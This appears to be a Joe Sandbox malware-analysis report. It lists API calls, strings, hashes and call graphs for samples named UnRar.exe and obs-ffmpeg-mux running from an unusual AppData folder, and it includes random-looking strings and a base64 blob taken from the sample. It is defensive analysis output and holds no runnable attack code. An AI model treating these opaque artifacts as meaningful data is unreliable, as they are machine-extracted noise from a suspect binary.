                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            APIs
                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID:
                                                            • API String ID: 1156100317-0
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                            • String ID: *.rev
                                                            • API String ID: 3587649625-4213698400
                                                            APIs
                                                              • Part of subcall function 00007FF7AACE4050: MessageBeep.USER32(?,?,?,?,00007FF7AACBDC84,?,?,?,?,?,?,?,?,?,00007FF7AACE4013), ref: 00007FF7AACE4072
                                                              • Part of subcall function 00007FF7AACDB3AC: LoadStringW.USER32 ref: 00007FF7AACDB433
                                                              • Part of subcall function 00007FF7AACDB3AC: LoadStringW.USER32 ref: 00007FF7AACDB44C
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACBD9EB
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACBD9F1
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACBD9FD
                                                            Strings
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$LoadString$BeepMessagefflush
                                                            • String ID: %s:
                                                            • API String ID: 1811793778-1393465352
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: swprintf
                                                            • String ID: %c%c%c%c%c%c%c$%c%c%c%c%c%c%c%c%c
                                                            • API String ID: 233258989-622958660
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: __except_validate_context_recordabort
                                                            • String ID: csm$csm
                                                            • API String ID: 746414643-3733052814
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$StringType
                                                            • String ID: $%s
                                                            • API String ID: 3586891840-3791308623
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                            • String ID: csm
                                                            • API String ID: 2466640111-1018135373
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: ByteCharErrorFileLastMultiWideWrite
                                                            • String ID: U
                                                            • API String ID: 2456169464-4171548499
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: InformationVolume_invalid_parameter_noinfo_noreturn
                                                            • String ID: FAT$FAT32
                                                            • API String ID: 4269842375-1174603449
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                            • String ID: Thread pool initialization failed.
                                                            • API String ID: 3340455307-2182114853
                                                            APIs
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$FileTime
                                                            • String ID:
                                                            • API String ID: 1137671866-0
                                                            APIs
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                            • String ID:
                                                            • API String ID: 4097890229-0
                                                            APIs
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                                            • String ID:
                                                            • API String ID: 3936042273-0
                                                            APIs
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                            • String ID:
                                                            • API String ID: 4141327611-0
                                                            APIs
                                                            Similarity
                                                            • API ID: FileMove_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3823481717-0
                                                            APIs
                                                            Similarity
                                                            • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 2359106489-0
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7AACFB12F,?,?,?,00007FF7AACFB0EA,?,?,00000000,00007FF7AACFB419), ref: 00007FF7AAD00715
                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7AACFB12F,?,?,?,00007FF7AACFB0EA,?,?,00000000,00007FF7AACFB419), ref: 00007FF7AAD00777
                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7AACFB12F,?,?,?,00007FF7AACFB0EA,?,?,00000000,00007FF7AACFB419), ref: 00007FF7AAD007B1
                                                            • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7AACFB12F,?,?,?,00007FF7AACFB0EA,?,?,00000000,00007FF7AACFB419), ref: 00007FF7AAD007DB
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                            • String ID:
                                                            • API String ID: 1557788787-0
                                                            APIs
                                                            Similarity
                                                            • API ID: CurrentPriorityThread$ClassProcess
                                                            • String ID:
                                                            • API String ID: 1171435874-0
                                                            APIs
                                                            Similarity
                                                            • API ID: ErrorLast$abort
                                                            • String ID:
                                                            • API String ID: 1447195878-0
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID: %s$ %s
                                                            • API String ID: 3668304517-2367710864
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID: rar
                                                            • API String ID: 3668304517-1792618458
                                                            APIs
                                                              • Part of subcall function 00007FF7AACC9FD0: CreateFileW.KERNELBASE ref: 00007FF7AACCA0AB
                                                              • Part of subcall function 00007FF7AACC9FD0: GetLastError.KERNEL32 ref: 00007FF7AACCA0BE
                                                              • Part of subcall function 00007FF7AACC9FD0: CreateFileW.KERNELBASE ref: 00007FF7AACCA11E
                                                              • Part of subcall function 00007FF7AACC9FD0: GetLastError.KERNEL32 ref: 00007FF7AACCA127
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACD9496
                                                            Strings
                                                            Similarity
                                                            • API ID: CreateErrorFileLast$_invalid_parameter_noinfo_noreturn
                                                            • String ID: $%s%s
                                                            • API String ID: 1381046063-4212163154
                                                            APIs
                                                              • Part of subcall function 00007FF7AACC0C68: GetLastError.KERNEL32(00000000,00000000), ref: 00007FF7AACC0C75
                                                              • Part of subcall function 00007FF7AACC0C68: FormatMessageW.KERNEL32 ref: 00007FF7AACC0CA9
                                                              • Part of subcall function 00007FF7AACC0C68: LocalFree.KERNEL32 ref: 00007FF7AACC0CD3
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACC121C
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACC1222
                                                            Strings
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$ErrorFormatFreeLastLocalMessagefflush
                                                            • String ID: %s
                                                            • API String ID: 3338125653-2495117400
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID: System Volume Information\
                                                            • API String ID: 3668304517-4227249723
                                                            • Opcode ID: 3c17c4326802313e560926a29751b24d28e1545a7f9e51f9ea90e2bb67fee599
                                                            • Instruction ID: 435235d2a82db93c803856de53af1aa8baa9db2206a434e2146bd6ed109df175
                                                            • Opcode Fuzzy Hash: 3c17c4326802313e560926a29751b24d28e1545a7f9e51f9ea90e2bb67fee599
                                                            • Instruction Fuzzy Hash: A551EF62A1B782C5FB00EB64D4803BDA761FB44BA4F855271DA6D136E9DF3CE482C360
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: e+000$gfff
                                                            • API String ID: 3215553584-3030954782
                                                            • Opcode ID: c16c9e0aaca838bf57974ce9f2164efadb1b7a4b5174a61bd03852391620eb26
                                                            • Instruction ID: b920940be84261ce29c1692f11dea7ece83206954204ce01631d4f1a15e7f13d
                                                            • Opcode Fuzzy Hash: c16c9e0aaca838bf57974ce9f2164efadb1b7a4b5174a61bd03852391620eb26
                                                            • Instruction Fuzzy Hash: 45513763B193C386F7259F35985136DAB91EB40B94F8982B2C69847BE6CE2CD046C710
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \\?\
                                                            • API String ID: 0-4282027825
                                                            • Opcode ID: 5d733a916d82734743caf5e6ea7a8d127602f343743acdd0c5d70af6158ab028
                                                            • Instruction ID: 628716bc7500620b15635d6bf444b8dc1b20e1ffb393975c3d6b9cd06eb66854
                                                            • Opcode Fuzzy Hash: 5d733a916d82734743caf5e6ea7a8d127602f343743acdd0c5d70af6158ab028
                                                            • Instruction Fuzzy Hash: 8951FF32A16782D5FB54EF21D4442BCA7A0FB48B88F8214B5DE5E137A1DF38E462C360
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                            • String ID: \033'
                                                            • API String ID: 73155330-3165038308
                                                            • Opcode ID: e1e65d390edf35f92f6c265c1dea4ce6a4dfd3975d2d9cd118f8152d5103f6e2
                                                            • Instruction ID: c61ace7afbee28026351048a07e4b66e430b9875e15e45452ad853ff3de1ca88
                                                            • Opcode Fuzzy Hash: e1e65d390edf35f92f6c265c1dea4ce6a4dfd3975d2d9cd118f8152d5103f6e2
                                                            • Instruction Fuzzy Hash: 1B41F062B0AB46D1FE10BB56E4542BDA310EB44BE0FC50671DE6E07BE6EE3DE1428310
                                                            APIs
                                                            Strings
                                                            • C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe, xrefs: 00007FF7AACFAF85
                                                            Similarity
                                                            • API ID: FileModuleName_invalid_parameter_noinfo
                                                            • String ID: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe
                                                            • API String ID: 3307058713-3942609192
                                                            • Opcode ID: 3d88997d612e58fdd6cd176ed81353cf28d32e481e6abda0fbeef29be17ab213
                                                            • Instruction ID: 709e1f40f18688d340b5041b60cff202b1cec17f93f8c56d4eddc88ec4e33961
                                                            • Opcode Fuzzy Hash: 3d88997d612e58fdd6cd176ed81353cf28d32e481e6abda0fbeef29be17ab213
                                                            • Instruction Fuzzy Hash: E0418C73A0A753CAF715EF2194500BCE6A4EB44BD4B964072E94E47B6ACE3DE483C320
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: ByteCharMultiWidesnprintf
                                                            • String ID: $%s$@%s
                                                            • API String ID: 3570271137-834177443
                                                            • Opcode ID: e6673dd7b86d7778f0022978c9d4f3a540cc0fbe6537023cd2fbba2bd2e54363
                                                            • Instruction ID: b62aa33b559e63be08ffb4af2b408741208be46b23cb5fdd98ca32c983aa225e
                                                            • Opcode Fuzzy Hash: e6673dd7b86d7778f0022978c9d4f3a540cc0fbe6537023cd2fbba2bd2e54363
                                                            • Instruction Fuzzy Hash: 1931C176B1AA86C5FA20AF65E4406A9A3A0FB44B84F811072DE4D17B79EE3DE506C310
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$_invalid_parameter_noinfo
                                                            • String ID: RAR
                                                            • API String ID: 1283921372-4236143952
                                                            • Opcode ID: d044c2dd542b4e7d770e56ca46a6c09d133d9efc04302d5c426f4de8fd9650dd
                                                            • Instruction ID: d12a064e6aa76a48f09f7dceea8405a0198f6ec6c6d673c1088c5937199d7750
                                                            • Opcode Fuzzy Hash: d044c2dd542b4e7d770e56ca46a6c09d133d9efc04302d5c426f4de8fd9650dd
                                                            • Instruction Fuzzy Hash: B831B662F16752C9FF00E7B4D4512BC6321AF45BA4F825371DABD26AEADF689046C310
                                                            APIs
                                                            • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7AACB324F), ref: 00007FF7AACF2370
                                                            • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7AACB324F), ref: 00007FF7AACF23B6
                                                            Strings
                                                            Similarity
                                                            • API ID: ExceptionFileHeaderRaise
                                                            • String ID: csm
                                                            • API String ID: 2573137834-1018135373
                                                            • Opcode ID: 666a5ac7589b60e949ef5d54d8dbb4e058397ac3e731a425920e86d7596641ef
                                                            • Instruction ID: 280f21f64ba852a5da86f3c7e0a39b895d9d85dc16aa6cd80daaeae2c9bf506e
                                                            • Opcode Fuzzy Hash: 666a5ac7589b60e949ef5d54d8dbb4e058397ac3e731a425920e86d7596641ef
                                                            • Instruction Fuzzy Hash: 0A113D32609B4282FB209F15F45026DB7A5FB88B94F994270DE8D07B68EF3CD556CB00
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF7AACE2A2B,?,?,?,00007FF7AACCD44A,?,?,?), ref: 00007FF7AACE2B2F
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7AACE2A2B,?,?,?,00007FF7AACCD44A,?,?,?), ref: 00007FF7AACE2B3A
                                                            Strings
                                                            Similarity
                                                            • API ID: ErrorLastObjectSingleWait
                                                            • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                            • API String ID: 1211598281-2248577382
                                                            • Opcode ID: 22a824227d2c6caa86385b7f3f1a8ffce9ae1a7f9d6426763e3823e6ecb769a1
                                                            • Instruction ID: 4c4ec4117eb1c5cf3ef12baad210b0ff1562e7b751f71e572fe2358ee2ae3a55
                                                            • Opcode Fuzzy Hash: 22a824227d2c6caa86385b7f3f1a8ffce9ae1a7f9d6426763e3823e6ecb769a1
                                                            • Instruction Fuzzy Hash: 18E01A21E1B802D1F650BB35AC91178A220AF60378FD253B0D07E529FE9F2CA54BC721

                                                            Execution Graph

                                                            Execution Coverage:7.6%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:2.5%
                                                            Total number of Nodes:403
                                                            Total number of Limit Nodes:9
7ffda379bee3 84348->84349 84350 7ffda379e960 49 API calls 84349->84350 84351 7ffda379bef5 Concurrency::details::ContextBase::GetWorkQueueIdentity 84350->84351 84351->84343 84369 7ffda379ecd0 84352->84369 84354 7ffda379bd2a Concurrency::details::_Scheduler::_Scheduler 84373 7ffda37a44c0 84354->84373 84362 7ffda379bdc7 84387 7ffda37a4540 84362->84387 84365 7ffda3799e10 84366 7ffda3799e2a Concurrency::task_continuation_context::task_continuation_context 84365->84366 84367 7ffda3799f70 ~Mailbox 47 API calls 84366->84367 84368 7ffda3799e4c 84367->84368 84368->84347 84370 7ffda379ecf7 Concurrency::event::wait std::_Fac_node::_Fac_node 84369->84370 84390 7ffda37a0850 84370->84390 84395 7ffda37aa910 84373->84395 84378 7ffda37a4430 84458 7ffda37aa670 84378->84458 84381 7ffda37a4460 84471 7ffda37aa750 84381->84471 84384 7ffda37a4510 84484 7ffda37aa960 84384->84484 84497 7ffda37aaa40 84387->84497 84391 7ffda37a086a Concurrency::details::ContextBase::GetWorkQueueIdentity 84390->84391 84392 7ffda379ed8e 84390->84392 84394 7ffda37a71a0 55 API calls 84391->84394 84392->84354 84394->84392 84407 7ffda37b5890 84395->84407 84398 7ffda379be40 55 API calls 84399 7ffda37a44ef 84398->84399 84400 7ffda379be40 84399->84400 84401 7ffda37a4430 55 API calls 84400->84401 84402 7ffda379be6d 84401->84402 84403 7ffda37a4460 55 API calls 84402->84403 84404 7ffda379be91 84403->84404 84442 7ffda37a4490 84404->84442 84412 7ffda37c37f0 84407->84412 84410 7ffda379be40 55 API calls 84411 7ffda37aa93f 84410->84411 84411->84398 84417 7ffda37cf670 84412->84417 84415 7ffda379be40 55 API calls 84416 7ffda37b58bf 84415->84416 84416->84410 84422 7ffda37df4b0 84417->84422 84420 7ffda379be40 55 API calls 84421 7ffda37c381f 84420->84421 84421->84415 84427 7ffda37f3170 84422->84427 84425 7ffda379be40 55 API calls 84426 7ffda37cf69f 84425->84426 84426->84420 84432 7ffda37f4bf0 84427->84432 84430 7ffda379be40 55 API calls 84431 7ffda37df4df 84430->84431 84431->84425 84437 7ffda37f6f90 84432->84437 84435 7ffda379be40 
55 API calls 84436 7ffda37f319f 84435->84436 84436->84430 84438 7ffda37f8be0 55 API calls 84437->84438 84439 7ffda37f6fbf 84438->84439 84440 7ffda379be40 55 API calls 84439->84440 84441 7ffda37f4c1f 84440->84441 84441->84435 84445 7ffda37aa830 84442->84445 84446 7ffda37aa852 84445->84446 84447 7ffda379bd5b 84446->84447 84455 7ffda37b5700 49 API calls ~Mailbox 84446->84455 84447->84378 84449 7ffda37aa877 84449->84447 84456 7ffda37b5810 6 API calls std::exception::exception 84449->84456 84451 7ffda37aa8a7 84452 7ffda37a0850 55 API calls 84451->84452 84453 7ffda37aa8e4 84452->84453 84457 7ffda37a7c00 49 API calls ~Mailbox 84453->84457 84455->84449 84456->84451 84457->84447 84459 7ffda37aa692 84458->84459 84460 7ffda379bd7f 84459->84460 84468 7ffda37b53e0 49 API calls ~Mailbox 84459->84468 84460->84381 84462 7ffda37aa6b7 84462->84460 84469 7ffda37b54f0 6 API calls std::exception::exception 84462->84469 84464 7ffda37aa6e7 84465 7ffda37a0850 55 API calls 84464->84465 84466 7ffda37aa724 84465->84466 84470 7ffda37a7c00 49 API calls ~Mailbox 84466->84470 84468->84462 84469->84464 84470->84460 84472 7ffda37aa772 84471->84472 84480 7ffda379bda3 84472->84480 84481 7ffda37b5570 49 API calls ~Mailbox 84472->84481 84474 7ffda37aa797 84474->84480 84482 7ffda37b5680 6 API calls std::exception::exception 84474->84482 84476 7ffda37aa7c7 84477 7ffda37a0850 55 API calls 84476->84477 84478 7ffda37aa804 84477->84478 84483 7ffda37a7c00 49 API calls ~Mailbox 84478->84483 84480->84384 84481->84474 84482->84476 84483->84480 84485 7ffda37aa982 84484->84485 84493 7ffda37a4530 84485->84493 84494 7ffda37b58e0 49 API calls ~Mailbox 84485->84494 84487 7ffda37aa9a7 84487->84493 84495 7ffda37b59f0 6 API calls std::exception::exception 84487->84495 84489 7ffda37aa9d7 84490 7ffda37a0850 55 API calls 84489->84490 84491 7ffda37aaa14 84490->84491 84496 7ffda37a7c00 49 API calls ~Mailbox 84491->84496 84493->84362 84494->84487 84495->84489 84496->84493 84498 7ffda37aaa62 84497->84498 84501 7ffda3797938 
84498->84501 84507 7ffda37b5a70 84498->84507 84500 7ffda37aaa87 84500->84501 84513 7ffda37b5b80 84500->84513 84501->84365 84503 7ffda37aaab7 84504 7ffda37a0850 55 API calls 84503->84504 84505 7ffda37aaaf4 84504->84505 84517 7ffda37a7c00 49 API calls ~Mailbox 84505->84517 84508 7ffda37b5ac7 84507->84508 84512 7ffda37b5b53 ~Mailbox 84507->84512 84518 7ffda37c3950 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 84508->84518 84510 7ffda37b5b39 84519 7ffda37b2b90 49 API calls ~Mailbox 84510->84519 84512->84500 84514 7ffda37b5ba2 std::exception::exception 84513->84514 84520 7ffda37c39b0 84514->84520 84516 7ffda37b5bb8 84516->84503 84517->84501 84518->84510 84519->84512 84521 7ffda37c39df std::_Fac_node::_Fac_node 84520->84521 84524 7ffda37cf840 84521->84524 84523 7ffda37c39ee 84523->84516 84529 7ffda37da120 84524->84529 84527 7ffda37cf8b4 84527->84523 84530 7ffda37da149 84529->84530 84534 7ffda37cf86e 84529->84534 84539 7ffda38179cc AcquireSRWLockExclusive SleepConditionVariableSRW ReleaseSRWLockExclusive 84530->84539 84535 7ffda37fae30 84534->84535 84537 7ffda37fae54 Concurrency::task_continuation_context::task_continuation_context 84535->84537 84536 7ffda37fae5b 84536->84527 84537->84536 84540 7ffda37fdfa0 84537->84540 84543 7ffda37fedd0 84540->84543 84546 7ffda37ff530 84543->84546 84547 7ffda3800450 VirtualAlloc 84546->84547 84548 7ffda37fdfdb 84547->84548 84548->84536

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: File$ThreadWindow$Resource$Find$CloseConsoleDesktopFlashHandleInfoMenuProcessProcessorSystemThreadpoolWaitWow64$ActiveAllocAttributeCallbacksDialogEnumHeapInformationLastLocalMemoryNextNodeNotificationNumaQueryTime$AffinityAliasesAllocateApplicationAttachAttributesBandwidthByteChangesCodeCommConditionConfigControlConvertCopyCreateCurrentCursorDateDebugDeleteDeviceDirectoryDrawDuplicateEnableErrorFiberFile2FinishedFirmwareFormatsFreeFromGlobalHeaderIdealInputInstalledLanguagesLargestLeadLengthLibraryLoadLocaleLockLogicalMaskMessageModuleMountMoveNameNumberOutputOverlappedPagePagesPaintParamPhysicalPhysicallyPointPopupPositionPostPowerRangeReadRecoveryRedirectionReservationResolveServerSettingSizeSleepStateStopSwitchTableTapeTimerUnregisterUserVariableVolumeWrite
                                                            • String ID: U41xISt2E5PfM97cQ$XX3g77F5HT8M6k5WDdakNi8Eupb$v8PoCDA5sLOX7U2A
                                                            • API String ID: 650054826-2015865665
                                                            • Opcode ID: 20fe0e45759f5d98e0cddd9f63ce774724192778df083206e93819e25c1cbadb
                                                            • Instruction ID: dac851834efa898838279c03b052eb5dbedde22f2352410d6f44e33149068d7f
                                                            • Opcode Fuzzy Hash: 20fe0e45759f5d98e0cddd9f63ce774724192778df083206e93819e25c1cbadb
                                                            • Instruction Fuzzy Hash: 88C10C32B1965183FB28DB35A83972F3263BF8C745F808479D54B59EA5CE7FD0498608

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: File$TimeTimer$DeleteFindMetaPrivateProcessorQueueVolume$AllocCallbackCloseCommErrorGlobalInfoLocaleModeNamespaceNextPalettePathPointProfileReadReturnsSearchSectionStringThreadWaitWhen$AtomBackupBitsCalendarCallbacksChangeCharCharacterClearClipCompletionConditionConfigConsoleCountCreateCriticalDirectoryEntriesEnumEventExtentFloatFormatFormatsHandleIdealIndexInformationInitializeLeaveLockMaskMaximumModesModuleMountNameNearestNodeNotificationNumaObjectOutputPowerResourceScriptsSelectSignalStatusSystemTextThreadpoolVariableVerifyWidthsWorkWriteZone
                                                            • String ID: 2$3beTmmvvC1F63K6WHrvVsGv7OJ2FX$8kO67Lgmh5GSUFA3182fPOFX$Z2twrKMZ8US6xow9ITlLK8v64FbnJ$dnFYjpitjQgEfAJRPfIZt$mkcBMg2fpqwYIVXp1ZWoGeDUp
                                                            • API String ID: 121820331-87464429
                                                            • Opcode ID: c2fd8ee2fc22ef0c0a9b2e5c7f9df47ea036286290a7ecbbecefd5d62d6efba5
                                                            • Instruction ID: 42bd213dce033f75c2170114097babbe25ab88710f7576d074b65dd49ce92c54
                                                            • Opcode Fuzzy Hash: c2fd8ee2fc22ef0c0a9b2e5c7f9df47ea036286290a7ecbbecefd5d62d6efba5
                                                            • Instruction Fuzzy Hash: 4CF13C32B192518BE728DF79E465B2E77A2FB89704F508039E64A96E59CF3FD4048B04

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Time$ConsoleLocalThread$FreeSystemWait$HandleInfo$ActiveBufferConditionErrorFileGlobalNamedPipeProcessScreenSpecificTimesTitleVolume$AffinityAllocBoostBoundaryByteCallbacksCancelCharClientCountCurrentDebugDefaultDescriptionDescriptorDiskDriveEnumEventFlagsFontFrameGroupGuaranteeHeapInformationInitializeIntegrityLabelLastLibraryLocaleMaskMemoryModeMountMultiMultipleNameObjectsOpenParamPathPointPriorityProfileQueryRectResourceSectionSemaphoreSessionSpaceStackStateStatusSynchronousTempThreadpoolTypeTypesUserVariableWideWrite
                                                            • String ID: 4fMVs978BNPf1hk89N$UeiDv92mz9hZb73XFU7gZ$Ve565npltFY2SoTHwL1$h1VLbf4R8rsjpSIGlujSL67O
                                                            • API String ID: 1813427410-1030410181
                                                            • Opcode ID: a530f8b2380662852fb634675e8832b7610bf8ecbbb91632e22c2edacc072d67
                                                            • Instruction ID: 45ada13c06151efe20d0f7981e78e7b11e2f989afd44565980d197d69f604dc7
                                                            • Opcode Fuzzy Hash: a530f8b2380662852fb634675e8832b7610bf8ecbbb91632e22c2edacc072d67
                                                            • Instruction Fuzzy Hash: 19024C76B05A4682EB18CB39E46572E6363FB8CB84F808176CA4E57BA5CE3FD4058704

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Create$FileObjectThreadpool$AttributesCloseDefaultFontHandlePositionResourceTapeUser$ActiveApisByteCharsetClearCommConfigConsoleCountCount64DefineDeviceDirectoryDuplicateExceptionFinalGlobalGroupHandlerHardIndirectLangLanguagesLeadLinkLoadMemoryMutexNamePathPowerPreferredProcessProcessorRegionReleaseRemoveRequestScriptsSelectSizeStatusStringTerminateTextThreadTickTimerTransactedVectoredVerifyWindowWorkWorking
                                                            • String ID: 4viVreLo9d18Fez2HF$8$8$8$8$Operation completed successfully.$Operation failed.$TWU5iBJQri2OO5MB4dtQkXYV8$x%
                                                            • API String ID: 2562434-336710652
                                                            • Opcode ID: 36e1c3783f9b64b428ac8eff27ccf0c2b825d730ebbb142a4a55e187ae5f8664
                                                            • Instruction ID: 68950b28e18137c10c087f53c38078ec4f08743269aa25eb49c0de3dcc1bffb1
                                                            • Opcode Fuzzy Hash: 36e1c3783f9b64b428ac8eff27ccf0c2b825d730ebbb142a4a55e187ae5f8664
                                                            • Instruction Fuzzy Hash: BD420572B192418BD758CF7CE86476EB7A2FB89344F504039E68AC7B59DA7ED8048F04

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            • j6CQXke34N9RE3fYb3Pvl8n, xrefs: 00007FFDA378A64E
                                                            • Xw3X5gLIXCFzO15Yy3d33, xrefs: 00007FFDA378A685
                                                            • 8G9k4Lma76WgaSciAw6T55b, xrefs: 00007FFDA378A536
                                                            • tmfpSIvUxF6753H2s, xrefs: 00007FFDA378A524
                                                            • 3qFfCcgD/1EYhQoBA+nCL4uKrSB2zlV8YcHsDEbxo9MFzlIbQGWyoXmjPYKy480XQzNCC20WHI+jpaPkDlkjMFA4mA5WYnOp8yOu9iL8Rsco+RbrzGSWkgQDX7FqdQoqER/xS3LxBQUoQn1J+XdGuYwVUabOd33VJ52FhwVTpj63wyiYK6YIxRt769d/9NZza7BAi89blCIIT18xK+7IZdYRrmmynxjQJU7dYu/24/ACJ1OhFfpubsYE6dqStTG2rTiq, xrefs: 00007FFDA378A455
                                                            • ab8p475zojzksO4, xrefs: 00007FFDA378A6BC
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: File$ThreadTime$Create$ExitFreeThreadpool$ConsoleFindInfoLibraryListNameOpenProcessValidVersion$ActiveApplicationBufferCallbackCallbacksChangeClassCleanupCloseCodeCompletionCriticalEnterEntryEventFirstFullGlobalGroupHistoryImageInformationInterlockedLinkLoadLocalLocaleMemoryModuleNotificationPowerPrefetchPriorityPushQueryQueuedRecoveryRegisterRequestScreenSectionSelectorSizeStackStatusSymbolicSystemTerminateTransactedVirtualWaitWorkWow64
                                                            • String ID: 3qFfCcgD/1EYhQoBA+nCL4uKrSB2zlV8YcHsDEbxo9MFzlIbQGWyoXmjPYKy480XQzNCC20WHI+jpaPkDlkjMFA4mA5WYnOp8yOu9iL8Rsco+RbrzGSWkgQDX7FqdQoqER/xS3LxBQUoQn1J+XdGuYwVUabOd33VJ52FhwVTpj63wyiYK6YIxRt769d/9NZza7BAi89blCIIT18xK+7IZdYRrmmynxjQJU7dYu/24/ACJ1OhFfpubsYE6dqStTG2rTiq$8G9k4Lma76WgaSciAw6T55b$Xw3X5gLIXCFzO15Yy3d33$ab8p475zojzksO4$j6CQXke34N9RE3fYb3Pvl8n$tmfpSIvUxF6753H2s
                                                            • API String ID: 2897069635-878317460
                                                            • Opcode ID: 409bc04082ec80ca9a793320c8c1970d6722e4646ad8771e6aff88865e4a4919
                                                            • Instruction ID: 9c8c1f9c95fda2178dac177ef4e5f01b61e73a3a435cdc15a197ef86fbd058bf
